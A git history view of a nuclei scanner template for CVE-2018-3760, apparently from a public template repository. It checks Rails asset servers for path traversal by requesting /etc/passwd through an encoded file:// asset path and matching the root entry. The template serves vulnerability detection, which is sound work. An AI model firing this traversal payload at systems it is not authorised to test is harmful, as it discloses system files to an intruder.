nuclei-templates/cves/2018/CVE-2018-3760.yaml

22 lines
391 B
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-3760
2020-04-05 18:01:09 +00:00
info:
2021-01-02 05:00:39 +00:00
name: Rails CVE-2018-3760
2020-04-05 18:01:09 +00:00
author: 0xrudra
severity: high
tags: cve,cve2018,rails,traversal
2020-04-05 18:01:09 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
matchers-condition: and
2020-04-05 18:01:09 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
2020-04-05 18:01:09 +00:00
- type: regex
regex:
2020-05-25 07:49:06 +00:00
- "root:[x*]:0:0:"
2020-04-05 18:01:09 +00:00
part: body